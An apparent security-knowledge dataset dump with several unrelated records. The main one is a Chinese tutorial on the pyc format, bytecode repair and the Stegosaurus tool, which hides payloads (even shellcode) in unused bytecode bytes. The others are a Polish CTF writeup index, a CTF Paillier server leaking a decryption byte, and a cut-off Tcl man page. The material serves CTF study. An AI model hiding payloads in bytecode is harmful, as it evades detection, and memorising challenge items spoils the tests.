text
stringlengths
100
9.93M
category
stringclasses
11 values
# pyc文件 code object === > 在我们导入 python 脚本时在目录下会生成个一个相应的 pyc 文件,是pythoncodeobj的持久化储存形式,加速下一次的装载。 ## 文件结构 pyc文件由三大部分组成 - 最开始4个字节是一个Maigc int, 标识此pyc的版本信息 - 接下来四个字节还是个int,是pyc产生的时间 - 序列化的 PyCodeObject,结构参照[include/code.h](https://github.com/python/cpython/blob/master/Include/code.h),序列化方法[python/marshal](https://github.com/python/cpython/blob/master/Python/marshal.c) **pyc完整的文件解析可以参照** - [Python程序的执行原理](http://python.jobbole.com/84599/) - [PYC文件格式分析](http://kdr2.com/tech/python/pyc-format.html) **关于co_code** 一串二进制流,代表着指令序列,具体定义在[include/opcode.h](https://github.com/python/cpython/blob/fc7df0e664198cb05cafd972f190a18ca422989c/Include/opcode.h)中,也可以参照[python opcodes](http://unpyc.sourceforge.net/Opcodes.html)。 由 - 指令(opcode),分为有参数和无参数两种,以 https://github.com/python/cpython/blob/fc7df0e664198cb05cafd972f190a18ca422989c/Include/opcode.h#L69 划分 - 参数(oparg) python3.6 以上参数永远占1字节,如果指令不带参数的话则以`0x00`代替,在运行过程中被解释器忽略,也是**Stegosaurus**技术原理;而低于python3.5的版本中指令不带参数的话却没有`0x00`填充 ### 例题 **[Hackover CTF 2016 : img-enc](https://github.com/ctfs/write-ups-2016/tree/master/hackover-ctf-2016/forensics/img-enc)** 首先尝试pycdc反编译失败 ```python # Source Generated with Decompyle++ # File: imgenc.pyc (Python 2.7) import sys import numpy as np from scipy.misc import imread, imsave def doit(input_file, output_file, f): Unsupported opcode: STOP_CODE img = imread(input_file, flatten = True) img /= 255 size = img.shape[0] # WARNING: Decompyle incomplete ``` 注意到是python2.7,也就是说指令序列共占1字节或3字节(有参数无参数) 使用pcads得到 ```xml imgenc.pyc (Python 2.7) ... 67 STOP_CODE 68 STOP_CODE 69 BINARY_DIVIDE 70 JUMP_IF_TRUE_OR_POP 5 73 LOAD_CONST 3: 0 76 LOAD_CONST 3: 0 79 BINARY_DIVIDE ``` 定位到出错的地方,观察发现 `LOAD_CONST LOAD_CONST BINARY_DIVIDE STORE_FAST opcodes (64 03 00 64 03 00 15 7d 05 00)`被破坏了,根据上下文线索修复后 ```xml 00000120 64 04 00 6b 00 00 72 ce 00 64 03 00 64 03 00 15 |d..k..r..d..d...| 00000130 7d 05 00 64 03 00 64 03 00 15 7d 05 00 64 03 00 |}..d..d...}..d..| 00000140 64 03 00 15 7d 05 00 64 03 00 64 03 00 15 7d 05 |d...}..d..d...}.| 00000150 00 64 03 00 64 03 00 15 7d 05 00 64 03 00 64 03 |.d..d...}..d..d.| 00000160 00 15 7d 05 00 64 03 00 64 03 00 15 7d 05 00 64 |..}..d..d...}..d| 00000170 03 00 64 03 00 15 7d 05 00 64 03 00 64 03 00 15 |..d...}..d..d...| 00000180 7d 05 00 64 03 00 64 03 00 15 7d 05 00 64 03 00 |}..d..d...}..d..| 00000190 64 03 00 15 7d 05 00 64 03 00 64 03 00 15 7d 05 |d...}..d..d...}.| 000001a0 00 64 03 00 64 03 00 15 7d 05 00 64 03 00 64 03 |.d..d...}..d..d.| 000001b0 00 15 7d 05 00 64 03 00 64 03 00 15 7d 05 00 6e |..}..d..d...}..n| ``` 接下来根据修复好的python源代码得到flag即可 **延伸**: - 题目: [0ctf-2017:py](https://github.com/ctfs/write-ups-2017/tree/master/0ctf-quals-2017/reverse/py-137) - writeup: [记一次手撸CPython bytecode](http://0x48.pw/2017/03/20/0x2f/) ## Tools ### [pycdc](https://github.com/zrax/pycdc) > 将python字节码转换为可读的python 源代码,包含了反汇编(pycads)和反编译(pycdc)两种工具 ### [Stegosaurus](https://github.com/AngelKitty/stegosaurus) > Stegosaurus 是一款隐写工具,它允许我们在 Python 字节码文件( pyc 或 pyo )中嵌入任意 Payload。由于编码密度较低,因此我们嵌入 Payload 的过程既不会改变源代码的运行行为,也不会改变源文件的文件大小。 Payload 代码会被分散嵌入到字节码之中,所以类似 strings 这样的代码工具无法查找到实际的 Payload。 Python 的 dis 模块会返回源文件的字节码,然后我们就可以使用 Stegosaurus 来嵌入 Payload 了。 原理是在 python 的字节码文件中,利用冗余空间,将完整的 payload 代码分散隐藏到这些零零碎碎的空间中。 具体用法可参看 [ctf-tools](https://ctf-wiki.github.io/ctf-tools/misc/)。 #### 例题 Bugku QAQ 赛题链接如下: ```shell http://ctf.bugku.com/files/447e4b626f2d2481809b8690613c1613/QAQ http://ctf.bugku.com/files/5c02892cd05a9dcd1c5a34ef22dd9c5e/cipher.txt ``` 首先拿到这道题,用 `010Editor` 乍一眼看过去,我们可以看到一些特征信息: 可以判断这是个跟 `python` 有关的东西,通过查阅相关资料可以判断这是个 `python` 经编译过后的 `pyc` 文件。这里可能很多小伙伴们可能不理解了,什么是 `pyc` 文件呢?为什么会生成 `pyc` 文件? `pyc` 文件又是何时生成的呢?下面我将一一解答这些问题。 简单来说, `pyc` 文件就是 `Python` 的字节码文件,是个二进制文件。我们都知道 `Python` 是一种全平台的解释性语言,全平台其实就是 `Python` 文件在经过解释器解释之后(或者称为编译)生成的 `pyc` 文件可以在多个平台下运行,这样同样也可以隐藏源代码。其实, `Python` 是完全面向对象的语言, `Python` 文件在经过解释器解释后生成字节码对象 `PyCodeObject` , `pyc` 文件可以理解为是 `PyCodeObject` 对象的持久化保存方式。而 `pyc` 文件只有在文件被当成模块导入时才会生成。也就是说, `Python` 解释器认为,只有 `import` 进行的模块才需要被重用。 生成 `pyc` 文件的好处显而易见,当我们多次运行程序时,不需要重新对该模块进行重新的解释。主文件一般只需要加载一次,不会被其他模块导入,所以一般主文件不会生成 `pyc` 文件。 我们举个例子来说明这个问题: 为了方便起见,我们事先创建一个test文件夹作为此次实验的测试: ```shell mkdir test && cd test/ ``` 假设我们现在有个 `test.py` 文件,文件内容如下: ```python def print_test(): print('Hello,Kitty!') print_test() ``` 我们执行以下命令: ```shell python3 test.py ``` 不用说,想必大家都知道打印出的结果是下面这个: ```shell Hello,Kitty! ``` 我们通过下面命令查看下当前文件夹下有哪些文件: ```shell ls -alh ``` 我们可以发现,并没有 `pyc` 文件生成。 ‘我们再去创建一个文件为 `import_test.py` 文件,文件内容如下: > 注: `test.py` 和 `import_test.py` 应当放在同一文件夹下 ```python import test test.print_test() ``` 我们执行以下命令: ```shell python3 import_test.py ``` 结果如下: ```shell Hello,Kitty! Hello,Kitty! ``` 诶,为啥会打印出两句相同的话呢?我们再往下看,我们通过下面命令查看下当前文件夹下有哪些文件: ```shell ls -alh ``` 结果如下: ```shell 总用量 20K drwxr-xr-x 3 python python 4.0K 11月 5 20:38 . drwxrwxr-x 4 python python 4.0K 11月 5 20:25 .. -rw-r--r-- 1 python python 31 11月 5 20:38 import_test.py drwxr-xr-x 2 python python 4.0K 11月 5 20:38 __pycache__ -rw-r--r-- 1 python python 58 11月 5 20:28 test.py ``` 诶,多了个 `__pycache__` 文件夹,我们进入文件夹下看看有什么? ```shell cd __pycache__ && ls ``` 我们可以看到生成了一个 `test.cpython-36.pyc` 。为什么是这样子呢? 我们可以看到,我们在执行 `python3 import_test.py` 命令的时候,首先开始执行的是 `import test` ,即导入 `test` 模块,而一个模块被导入时, `PVM(Python Virtual Machine)` 会在后台从一系列路径中搜索该模块,其搜索过程如下: - 在当前目录下搜索该模块 - 在环境变量 `PYTHONPATH` 中指定的路径列表中依次搜索 - 在 `python` 安装路径中搜索 事实上, `PVM` 通过变量 `sys.path` 中包含的路径来搜索,这个变量里面包含的路径列表就是上面提到的这些路径信息。 模块的搜索路径都放在了 `sys.path` 列表中,如果缺省的 `sys.path` 中没有含有自己的模块或包的路径,可以动态的加入 `(sys.path.apend)` 即可。 事实上, `Python` 中所有加载到内存的模块都放在 `sys.modules` 。当 `import` 一个模块时首先会在这个列表中查找是否已经加载了此模块,如果加载了则只是将模块的名字加入到正在调用 `import` 的模块的 `Local` 名字空间中。如果没有加载则从 `sys.path` 目录中按照模块名称查找模块文件,模块文件可以是 `py` 、 `pyc` 、 `pyd` ,找到后将模块载入内存,并加入到 `sys.modules` 中,并将名称导入到当前的 `Local` 名字空间。 可以看出来,**一个模块不会重复载入**。多个不同的模块都可以用 `import` 引入同一个模块到自己的 `Local` 名字空间,其实背后的 `PyModuleObject` 对象只有一个。 在这里,我还要说明一个问题,**`import` 只能导入模块,不能导入模块中的对象(类、函数、变量等)。**例如像上面这个例子,我在 `test.py` 里面定义了一个函数 `print_test()` ,我在另外一个模块文件 `import_test.py`不能直接通过 `import test.print_test` 将 `print_test` 导入到本模块文件中,只能用 `import test` 进行导入。如果我想只导入特定的类、函数、变量,用 `from test import print_test` 即可。 既然说到了 `import` 导入机制,再提一提嵌套导入和 `Package` 导入。 **`import` 嵌套导入** 嵌套,不难理解,就是一个套着一个。小时候我们都玩过俄罗斯套娃吧,俄罗斯套娃就是一个大娃娃里面套着一个小娃娃,小娃娃里面还有更小的娃娃,而这个嵌套导入也是同一个意思。假如我们现在有一个模块,我们想要导入模块 `A` ,而模块 `A` 中有含有其他模块需要导入,比如模块 `B` ,模块 `B` 中又含有模块 `C` ,一直这样延续下去,这种方式我们称之为 `import` 嵌套导入。 对这种嵌套比较容易理解,我们需要注意的一点就是各个模块的 `Local` 名字空间是独立的,所以上面的例子,本模块 `import A` 完了后,本模块只能访问模块 `A` ,不能访问 `B` 及其它模块。虽然模块 `B` 已经加载到内存了,如果要访问,还必须明确在本模块中导入 `import B` 。 那如果我们有以下嵌套这种情况,我们该怎么处理呢? 比如我们现在有个模块 `A` : ```python # A.py from B import D class C: pass ``` 还有个模块 `B` : ```python # B.py from A import C class D: pass ``` 我们简单分析一下程序,如果程序运行,应该会去从模块B中调用对象D。 我们尝试执行一下 `python A.py` : 报 `ImportError` 的错误,似乎是没有加载到对象 `D` ,而我们将 `from B import D` 改成 `import B` ,我们似乎就能执行成功了。 这是怎么回事呢?这其实是跟 `Python` 内部 `import` 的机制是有关的,具体到 `from B import D` , `Python` 内部会分成以下几个步骤: - 在 `sys.modules` 中查找符号 `B` - 如果符号 `B` 存在,则获得符号 `B` 对应的 `module` 对象 `<module B>` 。从 `<module B>` 的 `__dict__` 中获得符号 `D` 对应的对象,如果 `D` 不存在,则抛出异常 - 如果符号 `B` 不存在,则创建一个新的 `module` 对象 `<module B>` ,注意,此时 `module` 对象的 `__dict__` 为空。执行 `B.py` 中的表达式,填充 `<module B>` 的 `__dict__` 。从 `<module B>` 的 `__dict__` 中获得 `D` 对应的对象。如果 `D` 不存在,则抛出异常。 所以,这个例子的执行顺序如下: 1、执行 `A.py` 中的 `from B import D` > 注:由于是执行的 `python A.py` ,所以在 `sys.modules` 中并没有 `<module B>` 存在,首先为 `B.py` 创建一个 `module` 对象( `<module B>` ),注意,这时创建的这个 `module` 对象是空的,里边啥也没有,在 `Python` 内部创建了这个 `module` 对象之后,就会解析执行 `B.py` ,其目的是填充 `<module B>` 这个 `dict` 。 2、执行 `B.py` 中的 `from A import C` > 注:在执行 `B.py` 的过程中,会碰到这一句,首先检查 `sys.modules` 这个 `module` 缓存中是否已经存在 `<module A>` 了,由于这时缓存还没有缓存 `<module A>` ,所以类似的, `Python` 内部会为 `A.py` 创建一个 `module` 对象( `<module A>` ),然后,同样地,执行 `A.py` 中的语句。 3、再次执行 `A.py` 中的 `from B import D` > 注:这时,由于在第 `1` 步时,创建的 `<module B>` 对象已经缓存在了 `sys.modules` 中,所以直接就得到了 `<module B>` ,但是,注意,从整个过程来看,我们知道,这时 `<module B>` 还是一个空的对象,里面啥也没有,所以从这个 `module` 中获得符号 `D` 的操作就会抛出异常。如果这里只是 `import B` ,由于 `B` 这个符号在 `sys.modules` 中已经存在,所以是不会抛出异常的。 我们可以从下图很清楚的看到 `import` 嵌套导入的过程: **`Package` 导入** 包 `(Package)` 可以看成模块的集合,只要一个文件夹下面有个 `__init__.py` 文件,那么这个文件夹就可以看做是一个包。包下面的文件夹还可以成为包(子包)。更进一步的讲,多个较小的包可以聚合成一个较大的包。通过包这种结构,我们可以很方便的进行类的管理和维护,也方便了用户的使用。比如 `SQLAlchemy` 等都是以包的形式发布给用户的。 包和模块其实是很类似的东西,如果查看包的类型: `import SQLAlchemy type(SQLAlchemy)` ,可以看到其实也是 `<type 'module'>` 。 `import` 包的时候查找的路径也是 `sys.path`。 包导入的过程和模块的基本一致,只是导入包的时候会执行此包目录下的 **`__init__.py`** ,而不是模块里面的语句了。另外,如果只是单纯的导入包,而包的 `__init__.py` 中又没有明确的其他初始化操作,那么此包下面的模块是不会自动导入的。 假设我们有如下文件结构: ```markdown . └── PA ├── __init__.py ├── PB1 │   ├── __init__.py │   └── pb1_m.py ├── PB2 │   ├── __init__.py │   └── pb2_m.py └── wave.py ``` `wave.py` , `pb1_m.py` , `pb2_m.py` 文件中我们均定义了如下函数: ```python def getName(): pass ``` `__init__.py` 文件内容均为空。 我们新建一个 `test.py` ,内容如下: ```python import sys import PA.wave #1 import PA.PB1 #2 import PA.PB1.pb1_m as m1 #3 import PA.PB2.pb2_m #4 PA.wave.getName() #5 m1.getName() #6 PA.PB2.pb2_m.getName() #7 ``` 我们运行以后,可以看出是成功执行成功了,我们再看看目录结构: ```markdown . ├── PA │   ├── __init__.py │   ├── __init__.pyc │   ├── PB1 │   │   ├── __init__.py │   │   ├── __init__.pyc │   │   ├── pb1_m.py │   │   └── pb1_m.pyc │   ├── PB2 │   │   ├── __init__.py │   │   ├── __init__.pyc │   │   ├── pb2_m.py │   │   └── pb2_m.pyc │   ├── wave.py │   └── wave.pyc └── test.py ``` 我们来分析一下这个过程: - 当执行`#1` 后, `sys.modules` 会同时存在 `PA` 、 `PA.wave` 两个模块,此时可以调用 `PA.wave` 的任何类或函数了。但不能调用 `PA.PB1(2)` 下的任何模块。当前 `Local` 中有了 `PA` 名字。 - 当执行 `#2` 后,只是将 `PA.PB1` 载入内存, `sys.modules` 中会有 `PA` 、 `PA.wave` 、 `PA.PB1` 三个模块,但是 `PA.PB1` 下的任何模块都没有自动载入内存,此时如果直接执行 `PA.PB1.pb1_m.getName()` 则会出错,因为 `PA.PB1` 中并没有 `pb1_m` 。当前 `Local` 中还是只有 `PA` 名字,并没有 `PA.PB1` 名字。 - 当执行 `#3` 后,会将 `PA.PB1` 下的 `pb1_m` 载入内存, `sys.modules` 中会有 `PA` 、 `PA.wave` 、 `PA.PB1` 、 `PA.PB1.pb1_m` 四个模块,此时可以执行 `PA.PB1.pb1_m.getName()` 了。由于使用了 `as` ,当前 `Local` 中除了 `PA` 名字,另外添加了 `m1` 作为 `PA.PB1.pb1_m` 的别名。 - 当执行 `#4` 后,会将 `PA.PB2` 、 `PA.PB2.pb2_m` 载入内存, `sys.modules` 中会有 `PA` 、 `PA.wave` 、 `PA.PB1` 、 `PA.PB1.pb1_m` 、 `PA.PB2` 、 `PA.PB2.pb2_m` 六个模块。当前 `Local` 中还是只有 `PA` 、 `m1` 。 - 下面的 `#5` ,`#6` , `#7` 都是可以正确运行的。 > 注:需要注意的问题是如果 `PA.PB2.pb2_m` 想导入 `PA.PB1.pb1_m` 、 `PA.wave` 是可以直接成功的。最好是采用明确的导入路径,对于 `../..` 相对导入路径还是不推荐使用。 既然我们已经知道 `pyc` 文件的产生,再回到那道赛题,我们尝试将 `pyc` 文件反编译回 `python` 源码。我们使用在线的开源工具进行尝试: 部分代码没有反编译成功???我们可以尝试分析一下,大概意思就是读取 `cipher.txt` 那个文件,将那个文件内容是通过 `base64` 编码的,我们的目的是将文件内容解码,然后又已知 `key` ,通过 `encryt` 函数进行加密的,我们可以尝试将代码补全: ```python def encryt(key, plain): cipher = '' for i in range(len(plain)): cipher += chr(ord(key[i % len(key)]) ^ ord(plain[i])) return cipher def getPlainText(): plain = '' with open('cipher.txt') as (f): while True: line = f.readline() if line: plain += line else: break return plain.decode('base_64') def main(): key = 'LordCasser' plain = getPlainText() cipher = encryt(key, plain) with open('xxx.txt', 'w') as (f): f.write(cipher) if __name__ == '__main__': main() ``` 结果如下: ```markdown YOU ARE FOOLED THIS IS NOT THAT YOU WANT GO ON DUDE CATCH THAT STEGOSAURUS ``` 提示告诉我们用 `STEGOSAURUS` 工具进行隐写的,我们直接将隐藏的payload分离出来即可。 ```shell python3 stegosaurus.py -x QAQ.pyc ``` 我们得到了最终的 `flag` 为:**`flag{fin4lly_z3r0_d34d}`** 既然都说到这个份子上了,我们就来分析一下我们是如何通过 `Stegosaurus` 来嵌入 `Payload` 。 我们仍然以上面这个代码为例子,我们设置脚本名称为 `encode.py` 。 第一步,我们使用 `Stegosaurus` 来查看在不改变源文件 `(Carrier)` 大小的情况下,我们的 `Payload` 能携带多少字节的数据: ``` python3 -m stegosaurus encode.py -r ``` 现在,我们可以安全地嵌入最多24个字节的 `Payload` 了。如果不想覆盖源文件的话,我们可以使用 `-s` 参数来单独生成一个嵌入了 `Payload` 的 `py` 文件: ```shell python3 -m stegosaurus encode.py -s --payload "flag{fin4lly_z3r0_d34d}" ``` 现在我们可以用 `ls` 命令查看磁盘目录,嵌入了 `Payload` 的文件( `carrier` 文件)和原始的字节码文件两者大小是完全相同的: > 注:如果没有使用 `-s` 参数,那么原始的字节码文件将会被覆盖。 我们可以通过向 `Stegosaurus` 传递 `-x` 参数来提取出 `Payload` : ```shell python3 -m stegosaurus __pycache__/encode.cpython-36-stegosaurus.pyc -x ``` 我们构造的 `Payload` 不一定要是一个 `ASCII` 字符串, `shellcode` 也是可以的: 我们重新编写一个 `example.py` 模块,代码如下: ```python import sys import os import math def add(a,b): return int(a)+int(b) def sum1(result): return int(result)*3 def sum2(result): return int(result)/3 def sum3(result): return int(result)-3 def main(): a = 1 b = 2 result = add(a,b) print(sum1(result)) print(sum2(result)) print(sum3(result)) if __name__ == "__main__": main() ``` 我们让它携带 `Payload` 为 `flag_is_here`。 我们可以查看嵌入 `Payload` 之前和之后的 `Python` 代码运行情况: 通过 `strings` 查看 `Stegosaurus` 嵌入了 `Payload` 之后的文件输出情况( `payload` 并没有显示出来): 接下来使用 `Python` 的 `dis` 模块来查看 `Stegosaurus` 嵌入 `Payload` 之前和之后的文件字节码变化情况: 嵌入payload之前: ```shell #( 11/29/18@ 5:14下午 )( python@Sakura ):~/桌面 python3 -m dis example.py 1 0 LOAD_CONST 0 (0) 2 LOAD_CONST 1 (None) 4 IMPORT_NAME 0 (sys) 6 STORE_NAME 0 (sys) 2 8 LOAD_CONST 0 (0) 10 LOAD_CONST 1 (None) 12 IMPORT_NAME 1 (os) 14 STORE_NAME 1 (os) 3 16 LOAD_CONST 0 (0) 18 LOAD_CONST 1 (None) 20 IMPORT_NAME 2 (math) 22 STORE_NAME 2 (math) 4 24 LOAD_CONST 2 (<code object add at 0x7f90479778a0, file "example.py", line 4>) 26 LOAD_CONST 3 ('add') 28 MAKE_FUNCTION 0 30 STORE_NAME 3 (add) 6 32 LOAD_CONST 4 (<code object sum1 at 0x7f9047977810, file "example.py", line 6>) 34 LOAD_CONST 5 ('sum1') 36 MAKE_FUNCTION 0 38 STORE_NAME 4 (sum1) 9 40 LOAD_CONST 6 (<code object sum2 at 0x7f9047977ae0, file "example.py", line 9>) 42 LOAD_CONST 7 ('sum2') 44 MAKE_FUNCTION 0 46 STORE_NAME 5 (sum2) 12 48 LOAD_CONST 8 (<code object sum3 at 0x7f9047977f60, file "example.py", line 12>) 50 LOAD_CONST 9 ('sum3') 52 MAKE_FUNCTION 0 54 STORE_NAME 6 (sum3) 15 56 LOAD_CONST 10 (<code object main at 0x7f904798c300, file "example.py", line 15>) 58 LOAD_CONST 11 ('main') 60 MAKE_FUNCTION 0 62 STORE_NAME 7 (main) 23 64 LOAD_NAME 8 (__name__) 66 LOAD_CONST 12 ('__main__') 68 COMPARE_OP 2 (==) 70 POP_JUMP_IF_FALSE 78 24 72 LOAD_NAME 7 (main) 74 CALL_FUNCTION 0 76 POP_TOP >> 78 LOAD_CONST 1 (None) 80 RETURN_VALUE ``` 嵌入 `payload` 之后: ```shell #( 11/29/18@ 5:31下午 )( python@Sakura ):~/桌面 python3 -m dis example.py 1 0 LOAD_CONST 0 (0) 2 LOAD_CONST 1 (None) 4 IMPORT_NAME 0 (sys) 6 STORE_NAME 0 (sys) 2 8 LOAD_CONST 0 (0) 10 LOAD_CONST 1 (None) 12 IMPORT_NAME 1 (os) 14 STORE_NAME 1 (os) 3 16 LOAD_CONST 0 (0) 18 LOAD_CONST 1 (None) 20 IMPORT_NAME 2 (math) 22 STORE_NAME 2 (math) 4 24 LOAD_CONST 2 (<code object add at 0x7f146e7038a0, file "example.py", line 4>) 26 LOAD_CONST 3 ('add') 28 MAKE_FUNCTION 0 30 STORE_NAME 3 (add) 6 32 LOAD_CONST 4 (<code object sum1 at 0x7f146e703810, file "example.py", line 6>) 34 LOAD_CONST 5 ('sum1') 36 MAKE_FUNCTION 0 38 STORE_NAME 4 (sum1) 9 40 LOAD_CONST 6 (<code object sum2 at 0x7f146e703ae0, file "example.py", line 9>) 42 LOAD_CONST 7 ('sum2') 44 MAKE_FUNCTION 0 46 STORE_NAME 5 (sum2) 12 48 LOAD_CONST 8 (<code object sum3 at 0x7f146e703f60, file "example.py", line 12>) 50 LOAD_CONST 9 ('sum3') 52 MAKE_FUNCTION 0 54 STORE_NAME 6 (sum3) 15 56 LOAD_CONST 10 (<code object main at 0x7f146e718300, file "example.py", line 15>) 58 LOAD_CONST 11 ('main') 60 MAKE_FUNCTION 0 62 STORE_NAME 7 (main) 23 64 LOAD_NAME 8 (__name__) 66 LOAD_CONST 12 ('__main__') 68 COMPARE_OP 2 (==) 70 POP_JUMP_IF_FALSE 78 24 72 LOAD_NAME 7 (main) 74 CALL_FUNCTION 0 76 POP_TOP >> 78 LOAD_CONST 1 (None) 80 RETURN_VALUE ``` > 注: `Payload` 的发送和接受方法完全取决于用户个人喜好, `Stegosaurus` 只提供了一种向 `Python` 字节码文件嵌入或提取 `Payload` 的方法。但是为了保证嵌入之后的代码文件大小不会发生变化,因此 `Stegosaurus` 所支持嵌入的 `Payload` 字节长度十分有限。因此 ,如果你需要嵌入一个很大的 `Payload` ,那么你可能要将其分散存储于多个字节码文件中了。 为了在不改变源文件大小的情况下向其嵌入 `Payload` ,我们需要识别出字节码中的无效空间( `Dead Zone` )。这里所谓的无效空间指的是那些即使被修改也不会改变原 `Python` 脚本正常行为的那些字节数据。 需要注意的是,我们可以轻而易举地找出 `Python3.6` 代码中的无效空间。 `Python` 的引用解释器 `CPython` 有两种类型的操作码:即无参数的和有参数的。在版本号低于 `3.5` 的 `Python` 版本中,根据操作码是否带参,字节码中的操作指令将需要占用 `1` 个字节或 `3` 个字节。在 `Python3.6` 中就不一样了, `Python3.6` 中所有的指令都占用 `2` 个字节,并会将无参数指令的第二个字节设置为 `0` ,这个字节在其运行过程中将会被解释器忽略。这也就意味着,对于字节码中每一个不带参数的操作指令, `Stegosaurus` 都可以安全地嵌入长度为 `1` 个字节的 `Payload` 代码。 我们可以通过 `Stegosaurus` 的 `-vv` 选项来查看 `Payload` 是如何嵌入到这些无效空间之中的: ```shell #( 11/29/18@10:35下午 )( python@Sakura ):~/桌面 python3 -m stegosaurus example.py -s -p "ABCDE" -vv 2018-11-29 22:36:26,795 - stegosaurus - DEBUG - Validated args 2018-11-29 22:36:26,797 - stegosaurus - INFO - Compiled example.py as __pycache__/example.cpython-36.pyc for use as carrier 2018-11-29 22:36:26,797 - stegosaurus - DEBUG - Read header and bytecode from carrier 2018-11-29 22:36:26,798 - stegosaurus - DEBUG - POP_TOP (0) 2018-11-29 22:36:26,798 - stegosaurus - DEBUG - POP_TOP (0) 2018-11-29 22:36:26,798 - stegosaurus - DEBUG - POP_TOP (0) 2018-11-29 22:36:26,798 - stegosaurus - DEBUG - RETURN_VALUE (0) 2018-11-29 22:36:26,798 - stegosaurus - DEBUG - BINARY_SUBTRACT (0) 2018-11-29 22:36:26,798 - stegosaurus - DEBUG - RETURN_VALUE (0) 2018-11-29 22:36:26,798 - stegosaurus - DEBUG - BINARY_TRUE_DIVIDE (0) 2018-11-29 22:36:26,798 - stegosaurus - DEBUG - RETURN_VALUE (0) 2018-11-29 22:36:26,798 - stegosaurus - DEBUG - BINARY_MULTIPLY (0) 2018-11-29 22:36:26,798 - stegosaurus - DEBUG - RETURN_VALUE (0) 2018-11-29 22:36:26,798 - stegosaurus - DEBUG - BINARY_ADD (0) 2018-11-29 22:36:26,798 - stegosaurus - DEBUG - RETURN_VALUE (0) 2018-11-29 22:36:26,798 - stegosaurus - DEBUG - POP_TOP (0) 2018-11-29 22:36:26,798 - stegosaurus - DEBUG - RETURN_VALUE (0) 2018-11-29 22:36:26,798 - stegosaurus - INFO - Found 14 bytes available for payload Payload embedded in carrier 2018-11-29 22:36:26,799 - stegosaurus - DEBUG - POP_TOP (65) ----A 2018-11-29 22:36:26,799 - stegosaurus - DEBUG - POP_TOP (66) ----B 2018-11-29 22:36:26,799 - stegosaurus - DEBUG - POP_TOP (67) ----C 2018-11-29 22:36:26,799 - stegosaurus - DEBUG - RETURN_VALUE (68) ----D 2018-11-29 22:36:26,799 - stegosaurus - DEBUG - BINARY_SUBTRACT (69) ----E 2018-11-29 22:36:26,799 - stegosaurus - DEBUG - RETURN_VALUE (0) 2018-11-29 22:36:26,799 - stegosaurus - DEBUG - BINARY_TRUE_DIVIDE (0) 2018-11-29 22:36:26,799 - stegosaurus - DEBUG - RETURN_VALUE (0) 2018-11-29 22:36:26,799 - stegosaurus - DEBUG - BINARY_MULTIPLY (0) 2018-11-29 22:36:26,799 - stegosaurus - DEBUG - RETURN_VALUE (0) 2018-11-29 22:36:26,799 - stegosaurus - DEBUG - BINARY_ADD (0) 2018-11-29 22:36:26,799 - stegosaurus - DEBUG - RETURN_VALUE (0) 2018-11-29 22:36:26,799 - stegosaurus - DEBUG - POP_TOP (0) 2018-11-29 22:36:26,799 - stegosaurus - DEBUG - RETURN_VALUE (0) 2018-11-29 22:36:26,799 - stegosaurus - DEBUG - Creating new carrier file name for side-by-side install 2018-11-29 22:36:26,799 - stegosaurus - INFO - Wrote carrier file as __pycache__/example.cpython-36-stegosaurus.pyc ``` **Challenges:** [WHCTF-2017:Py-Py-Py](https://www.xctf.org.cn/library/details/whctf-writeup/) ### 参考文献 - https://github.com/AngelKitty/stegosaurus - [一种用于在Python字节码中嵌入Payload的隐写工具 – Stegosaurus](http://www.freebuf.com/sectool/129357.html)
sec-knowleage
# Writeup TrendMicro CTF 2015 Uczestniczyliśmy (Shalom, msm, Rev, other019, nazywam i graszka22) w TrendMicro CTF, i znowu spróbujemy opisać zadania z którymi walczyliśmy (a przynajmniej te, które pokonaliśmy). Ogólne wrażenia: * Zadania były podzelone na nietypowe kategorie, niemniej same zadania specjalnie nie odbiegały od standardu. Utrudniało to jednak wybranie "swoich" zadań. Organizatorzy nie chcieli pewnie, żeby ich klienci widzieli że w konkursie są kategorie typu "binary exploitation" czy "web hacking" więc nazwali je bp. "analysis-offensive" * Organizatorzy zrobili zadanie za 100p z krzyżówką gdzie wszystkie pytania dotyczyły ich firmy, np. "jak nazywa sie CEO", "w którym roku powstała", "jak sie nazywa produkt do..." ;] W spisie treci umieszczamy 2 klasyfikacje typu zadania - standardową (eg. forensics, reverse, pwn, web, ppc, crypto) oraz tą proponowaną przez organizatorów (Analysis-others, Analysis-defensive, Analysis-offensive, Programming, Misc, Cryptography). # Spis treści: * [Calculator (ppc/Programming 200)](calculator) * [Colors (ppc/Programming 100)](colors) * [Captcha (ppc/Misc 300)](captcha) * [RSA (crypto/Cryptography 100)](rsa) * [AES (crypto/Cryptography 200)](aes) * [Maze (ppc/Programming 300)](maze) * [Offensive 100 (web/Analysis-offensive 100)](offensive100) * [Defense 100(reverse/Analysis-defensive 100)](defense100) * [Other 100 (forensics/Analysis-other 100)](other100) # Zakończenie Zachęcamy do komentarzy/pytań/czegokolwiek.
sec-knowleage
#!/usr/bin/env python from Crypto.Util.number import * from gmpy import * from random import * import sys,os sys.stdin = os.fdopen(sys.stdin.fileno(), 'r', 0) sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0) rnd = SystemRandom() def encrypt(g,n,data): num = bytes_to_long(data) res = pow(g,num,n*n) r = rnd.randint(0,n-1) magic = pow(r,n,n*n) res = (res*magic)%(n*n) return long_to_bytes(res).encode('hex') def decrypt(phi,n,u,data): num = bytes_to_long(data) res = pow(num,phi,n*n) res = (res - 1)/n res = (res*u)%n return long_to_bytes(res).encode('hex') if __name__ == '__main__': p = getPrime(512) q = getPrime(512) n = p*q phi = (p-1)*(q-1) g = n+1 u = invert(phi,n) flag = open('flag').read() print 'Here is the flag!' print encrypt(g,n,flag) for i in xrange(2048): m = raw_input('cmd: ') if m[0] == 'A': m = raw_input('input: ') try: m = m.decode('hex') print encrypt(g,n,m) except: print 'no' exit(0) if m[0] == 'B': m = raw_input('input: ') try: m = m.decode('hex') print decrypt(phi,n,u,m)[-2:] except: print 'no' exit(0)
sec-knowleage
'\" '\" Copyright (c) 1993 The Regents of the University of California. '\" Copyright (c) 1994-1996 Sun Microsystems, Inc. '\" '\" See the file "license.terms" for information on usage and redistribution '\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\" '\" '\" The definitions below are for supplemental macros used in Tcl/Tk '\" manual entries. '\" '\" .AP type name in/out ?indent? '\" Start paragraph describing an argument to a library procedure. '\" type is type of argument (int, etc.), in/out is either "in", "out", '\" or "in/out" to describe whether procedure reads or modifies arg, '\" and indent is equivalent to second arg of .IP (shouldn't ever be '\" needed; use .AS below instead) '\" '\" .AS ?type? ?name? '\" Give maximum sizes of arguments for setting tab stops. Type and '\" name are examples of largest possible arguments that will be passed '\" to .AP later. If args are omitted, default tab stops are used. '\" '\" .BS '\" Start box enclosure. From here until next 